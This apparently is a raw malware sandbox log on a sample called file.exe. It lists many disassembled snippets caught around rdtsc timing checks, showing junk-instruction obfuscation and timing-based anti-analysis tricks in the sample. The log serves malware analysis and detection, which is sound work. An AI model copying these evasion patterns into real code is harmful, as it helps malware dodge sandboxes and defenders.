                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101396F second address: 10139ED instructions: 0x00000000 rdtsc 0x00000002 jl 00007F84086DC799h 0x00000008 jmp 00007F84086DC793h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 jnl 00007F84086DC791h 0x00000016 nop 0x00000017 push ecx 0x00000018 mov ebx, edx 0x0000001a pop ebx 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push eax 0x00000020 call 00007F84086DC788h 0x00000025 pop eax 0x00000026 mov dword ptr [esp+04h], eax 0x0000002a add dword ptr [esp+04h], 0000001Ah 0x00000032 inc eax 0x00000033 push eax 0x00000034 ret 0x00000035 pop eax 0x00000036 ret 0x00000037 and edi, dword ptr [ebp+122D2A97h] 0x0000003d mov ebx, esi 0x0000003f push 00000000h 0x00000041 jmp 00007F84086DC78Eh 0x00000046 push eax 0x00000047 push eax 0x00000048 push edx 0x00000049 jmp 00007F84086DC78Bh 0x0000004e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101492B second address: 1014930 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1013B46 second address: 1013B60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F84086DC791h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1014930 second address: 1014983 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b jmp 00007F8408CC9F93h 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ebp 0x00000015 call 00007F8408CC9F88h 0x0000001a pop ebp 0x0000001b mov dword ptr [esp+04h], ebp 0x0000001f add dword ptr [esp+04h], 00000016h 0x00000027 inc ebp 0x00000028 push ebp 0x00000029 ret 0x0000002a pop ebp 0x0000002b ret 0x0000002c push 00000000h 0x0000002e mov dword ptr [ebp+122D22F2h], esi 0x00000034 sbb bh, 00000013h 0x00000037 push eax 0x00000038 push ebx 0x00000039 push eax 0x0000003a push edx 0x0000003b jbe 00007F8408CC9F86h 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1013B60 second address: 1013B66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1013B66 second address: 1013B6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10169CE second address: 10169D8 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F84086DC78Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1015C48 second address: 1015C77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F8408CC9F96h 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jl 00007F8408CC9F8Ch 0x00000018 jbe 00007F8408CC9F86h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1015C77 second address: 1015C95 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F84086DC799h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10178BC second address: 101791D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop esi 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push esi 0x0000000c call 00007F8408CC9F88h 0x00000011 pop esi 0x00000012 mov dword ptr [esp+04h], esi 0x00000016 add dword ptr [esp+04h], 00000016h 0x0000001e inc esi 0x0000001f push esi 0x00000020 ret 0x00000021 pop esi 0x00000022 ret 0x00000023 mov edi, dword ptr [ebp+1247B65Eh] 0x00000029 push 00000000h 0x0000002b mov edi, dword ptr [ebp+122D22F2h] 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push ebp 0x00000036 call 00007F8408CC9F88h 0x0000003b pop ebp 0x0000003c mov dword ptr [esp+04h], ebp 0x00000040 add dword ptr [esp+04h], 00000014h 0x00000048 inc ebp 0x00000049 push ebp 0x0000004a ret 0x0000004b pop ebp 0x0000004c ret 0x0000004d mov dword ptr [ebp+122D1AA1h], esi 0x00000053 mov bh, 39h 0x00000055 xchg eax, esi 0x00000056 push eax 0x00000057 push edx 0x00000058 pushad 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101791D second address: 1017935 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F84086DC793h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101897F second address: 1018983 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1017B12 second address: 1017B20 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1017B20 second address: 1017B25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1018A24 second address: 1018A29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1017B25 second address: 1017B2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101B861 second address: 101B866 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101B866 second address: 101B8C6 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8408CC9F9Ah 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007F8408CC9F88h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 00000019h 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 push 00000000h 0x00000027 adc edi, 459049D9h 0x0000002d push 00000000h 0x0000002f mov di, si 0x00000032 xchg eax, esi 0x00000033 jmp 00007F8408CC9F8Ch 0x00000038 push eax 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c push esi 0x0000003d pop esi 0x0000003e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101B8C6 second address: 101B8EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84086DC799h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jne 00007F84086DC786h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101C96A second address: 101C9C3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jp 00007F8408CC9F86h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f or ebx, dword ptr [ebp+122D2A4Bh] 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push eax 0x0000001a call 00007F8408CC9F88h 0x0000001f pop eax 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 add dword ptr [esp+04h], 00000018h 0x0000002c inc eax 0x0000002d push eax 0x0000002e ret 0x0000002f pop eax 0x00000030 ret 0x00000031 and ebx, dword ptr [ebp+122D1D34h] 0x00000037 push 00000000h 0x00000039 pushad 0x0000003a jmp 00007F8408CC9F8Ch 0x0000003f or ecx, dword ptr [ebp+122D1A54h] 0x00000045 popad 0x00000046 xchg eax, esi 0x00000047 pushad 0x00000048 push eax 0x00000049 push edx 0x0000004a push eax 0x0000004b pop eax 0x0000004c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101C9C3 second address: 101C9DB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F84086DC78Ch 0x0000000c popad 0x0000000d push eax 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101D8F0 second address: 101D96E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push eax 0x0000000a call 00007F8408CC9F88h 0x0000000f pop eax 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 add dword ptr [esp+04h], 00000018h 0x0000001c inc eax 0x0000001d push eax 0x0000001e ret 0x0000001f pop eax 0x00000020 ret 0x00000021 or dword ptr [ebp+122D255Eh], edi 0x00000027 push 00000000h 0x00000029 mov ebx, dword ptr [ebp+122D2E42h] 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push ebp 0x00000034 call 00007F8408CC9F88h 0x00000039 pop ebp 0x0000003a mov dword ptr [esp+04h], ebp 0x0000003e add dword ptr [esp+04h], 00000016h 0x00000046 inc ebp 0x00000047 push ebp 0x00000048 ret 0x00000049 pop ebp 0x0000004a ret 0x0000004b jg 00007F8408CC9F8Ch 0x00000051 mov dword ptr [ebp+122D1B3Fh], esi 0x00000057 xchg eax, esi 0x00000058 jmp 00007F8408CC9F90h 0x0000005d push eax 0x0000005e pushad 0x0000005f push eax 0x00000060 push edx 0x00000061 pushad 0x00000062 popad 0x00000063 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101D96E second address: 101D98B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84086DC795h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101D98B second address: 101D98F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101F8EF second address: 101F8F4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101CBAB second address: 101CBAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101CBAF second address: 101CBB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101DB1B second address: 101DB20 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101DB20 second address: 101DB26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101EAB6 second address: 101EB2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 je 00007F8408CC9F86h 0x0000000b jg 00007F8408CC9F86h 0x00000011 popad 0x00000012 popad 0x00000013 nop 0x00000014 add dword ptr [ebp+12473F3Ch], edx 0x0000001a pushad 0x0000001b mov ecx, dword ptr [ebp+122D27EFh] 0x00000021 sub edx, 5C614A32h 0x00000027 popad 0x00000028 push dword ptr fs:[00000000h] 0x0000002f jmp 00007F8408CC9F97h 0x00000034 mov dword ptr fs:[00000000h], esp 0x0000003b sbb edi, 766EC52Dh 0x00000041 mov eax, dword ptr [ebp+122D119Dh] 0x00000047 pushad 0x00000048 pushad 0x00000049 pushad 0x0000004a popad 0x0000004b jl 00007F8408CC9F86h 0x00000051 popad 0x00000052 popad 0x00000053 push FFFFFFFFh 0x00000055 mov dword ptr [ebp+122D1A4Fh], ebx 0x0000005b push eax 0x0000005c push eax 0x0000005d push edx 0x0000005e jo 00007F8408CC9F8Ch 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10217A5 second address: 10217AF instructions: 0x00000000 rdtsc 0x00000002 js 00007F84086DC78Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101EB2E second address: 101EB32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1020A50 second address: 1020AD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 nop 0x00000007 push edi 0x00000008 pop ebx 0x00000009 push dword ptr fs:[00000000h] 0x00000010 push 00000000h 0x00000012 push esi 0x00000013 call 00007F84086DC788h 0x00000018 pop esi 0x00000019 mov dword ptr [esp+04h], esi 0x0000001d add dword ptr [esp+04h], 00000016h 0x00000025 inc esi 0x00000026 push esi 0x00000027 ret 0x00000028 pop esi 0x00000029 ret 0x0000002a movsx edi, bx 0x0000002d mov dword ptr fs:[00000000h], esp 0x00000034 push 00000000h 0x00000036 push ebx 0x00000037 call 00007F84086DC788h 0x0000003c pop ebx 0x0000003d mov dword ptr [esp+04h], ebx 0x00000041 add dword ptr [esp+04h], 0000001Ch 0x00000049 inc ebx 0x0000004a push ebx 0x0000004b ret 0x0000004c pop ebx 0x0000004d ret 0x0000004e mov bx, 3422h 0x00000052 mov eax, dword ptr [ebp+122D07B1h] 0x00000058 jg 00007F84086DC78Ch 0x0000005e push FFFFFFFFh 0x00000060 push eax 0x00000061 push eax 0x00000062 push edx 0x00000063 jmp 00007F84086DC78Dh 0x00000068 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10227C0 second address: 10227C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10227C6 second address: 10227E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F84086DC78Eh 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1022A16 second address: 1022A1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102B983 second address: 102B987 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102B987 second address: 102B993 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F8408CC9F86h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102B993 second address: 102B997 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102BACE second address: 102BAD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102BAD2 second address: 102BADA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102BADA second address: 102BAF5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8408CC9F95h 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102BC9A second address: 102BCA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102BCA6 second address: 102BCAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102E759 second address: 102E75D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCC119 second address: FCC123 instructions: 0x00000000 rdtsc 0x00000002 js 00007F8408CC9F86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCC123 second address: FCC156 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84086DC794h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F84086DC795h 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCC156 second address: FCC16C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8408CC9F90h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1032C89 second address: 1032CA2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84086DC790h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1032CA2 second address: 1032CAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1032CAF second address: 1032CC8 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F84086DC786h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 jl 00007F84086DC786h 0x00000018 pop esi 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1032EBB second address: 1032ED6 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8408CC9F8Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007F8408CC9F88h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1032ED6 second address: 1032F00 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jng 00007F84086DC786h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push eax 0x00000013 push edx 0x00000014 push ebx 0x00000015 jmp 00007F84086DC794h 0x0000001a pop ebx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10387F2 second address: 10387FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103756B second address: 10375A6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop ebx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F84086DC792h 0x00000012 jo 00007F84086DC786h 0x00000018 jmp 00007F84086DC78Bh 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 push edx 0x00000021 pop edx 0x00000022 jnl 00007F84086DC786h 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10375A6 second address: 10375AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10375AA second address: 10375B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10375B0 second address: 10375C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8408CC9F93h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1037C88 second address: 1037C8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1037DEE second address: 1037E01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jng 00007F8408CC9F86h 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10380A1 second address: 10380B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b jc 00007F84086DC786h 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10380B3 second address: 10380D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007F8408CC9F91h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10380D0 second address: 10380D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1038257 second address: 103825C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103825C second address: 103826C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84086DC78Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCA603 second address: FCA61B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8408CC9F91h 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCA61B second address: FCA63B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jbe 00007F84086DC786h 0x0000000c jmp 00007F84086DC78Eh 0x00000011 push esi 0x00000012 pop esi 0x00000013 popad 0x00000014 push ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103E901 second address: 103E90D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jc 00007F8408CC9F86h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1011563 second address: 10115C8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007F84086DC788h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 00000016h 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 movzx edi, cx 0x00000027 mov ecx, dword ptr [ebp+122D26BAh] 0x0000002d lea eax, dword ptr [ebp+1248336Fh] 0x00000033 push 00000000h 0x00000035 push ebp 0x00000036 call 00007F84086DC788h 0x0000003b pop ebp 0x0000003c mov dword ptr [esp+04h], ebp 0x00000040 add dword ptr [esp+04h], 00000015h 0x00000048 inc ebp 0x00000049 push ebp 0x0000004a ret 0x0000004b pop ebp 0x0000004c ret 0x0000004d sub dword ptr [ebp+12446F3Ch], ecx 0x00000053 push eax 0x00000054 pushad 0x00000055 pushad 0x00000056 push esi 0x00000057 pop esi 0x00000058 push eax 0x00000059 pop eax 0x0000005a popad 0x0000005b pushad 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10116AD second address: 10116B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10116B1 second address: 10116B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10116B7 second address: 10116BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10117CB second address: 10117D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10117D1 second address: 10117D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1011CFD second address: 1011D01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
